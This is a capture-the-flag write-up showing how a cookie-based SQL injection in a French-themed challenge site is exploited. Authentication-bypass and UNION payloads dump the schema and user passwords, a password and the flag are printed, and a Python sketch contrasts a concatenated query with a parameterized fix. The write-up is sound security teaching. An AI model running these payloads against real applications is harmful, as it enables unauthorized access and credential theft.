La Vie Française

When we arrive in this challenge, we access a web page where we can create an account by clicking on Postuler.

Because I am someone really original, I created the user a with the password… a. We can then log in with this account and arrive at the account page.

At first I tried some SQLi on the previous forms without luck. I noticed that we have a uuid cookie and started looking into this on the web. Still nothing. I remembered a challenge on WebGoat that used SQLi on cookies, and when I tried XXX' OR True -- - I was connected as jacquesrival.

I tried using the XXX' OR True ORDER BY 3 -- - command to access the user madeleineforestier, who has administrator rights, but even connected to this admin user with this technique, this wasn't enough. I then tried a basic UNION-based attack to recover information from the database and found that there were 3 columns using the following command:

XXX' UNION Select '1','2',3 -- -

Note that only parameters 1 and 2 are displayed, so there is no need to set the value of the third parameter.

We can now use the following command to dump all the databases:

XXX' UNION Select '1',group_concat(0x7c,schema_name,0x7c),3 from information_schema.schemata -- -

We can see that the database we are looking for is named usersdb. We can now run the following command to dump the tables:

XXX' UNION select group_concat(0x7c,TABLE_NAME,0x7c),group_concat(0x7c,TABLE_SCHEMA,0x7c),3 from INFORMATION_SCHEMA.TABLES where table_schema='usersdb'-- -

As we can see, the database usersdb contains only one table, called users. We can now list all the column names of this table using the following command:

XXX' UNION select group_concat(0x7c,COLUMN_NAME,0x7c),group_concat(0x7c,TABLE_NAME,0x7c),3 from INFORMATION_SCHEMA.COLUMNS where table_name='users' -- -

We can see that there are username and password attributes, which we may want to dump using the following command:

XXX' UNION select group_concat(0x7c,username,0x7c),group_concat(0x7c,password,0x7c),3 from users -- -

We see a list of passwords. We can try connecting to the madeleineforestier account using the password fo2DVkgShz2pPJ and then go to the admin panel.

We get the flag: 404CTF{B3w4Re_th3_d3STruct1v3s_Qu0tes}
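Every step above works because the uuid cookie reaches the SQL statement as text. The sketch below is an added example, not code from the challenge or from the original post: it contrasts a concatenated session lookup with a validated, parameterized one, fed with two cookie values quoted earlier. The table layout, query text, function names and sample rows are assumptions, and an in-memory SQLite database stands in for the challenge's backend.

```python
import sqlite3
import uuid

# Hypothetical session lookup; the challenge's real query is not shown.
QUERY = "SELECT username, password, uuid FROM users WHERE uuid = "

def make_db():
    # Constructed sample data in an in-memory SQLite database (assumption:
    # the real backend and schema differ; only the flaw is reproduced).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (uuid TEXT, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("11111111-1111-4111-8111-111111111111", "alice", "constructed-pw-1"),
        ("22222222-2222-4222-8222-222222222222", "bob", "constructed-pw-2"),
    ])
    return db

def lookup_vulnerable(db, cookie):
    # The cookie is pasted into the statement, so a quote inside it closes
    # the string literal and everything after it is parsed as SQL.
    return db.execute(QUERY + "'" + cookie + "'").fetchone()

def lookup_hardened(db, cookie):
    # 1. Accept only a canonical lowercase UUID; anything else is no session.
    try:
        if str(uuid.UUID(cookie)) != cookie:
            return None
    except (ValueError, TypeError, AttributeError):
        return None
    # 2. Bind the value as a parameter: the driver passes it as data, so it
    #    can never change the structure of the statement.
    return db.execute(QUERY + "?", (cookie,)).fetchone()

if __name__ == "__main__":
    db = make_db()
    for cookie in ("11111111-1111-4111-8111-111111111111",
                   "XXX' OR True -- -",
                   "XXX' UNION Select '1','2',3 -- -"):
        print(repr(cookie))
        print("  vulnerable:", lookup_vulnerable(db, cookie))
        print("  hardened:  ", lookup_hardened(db, cookie))
```

Parameter binding alone closes the injection; the UUID check additionally rejects malformed cookies before any query runs, which also gives a clean signal to log and alert on.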

This post is licensed under CC BY 4.0 by the author.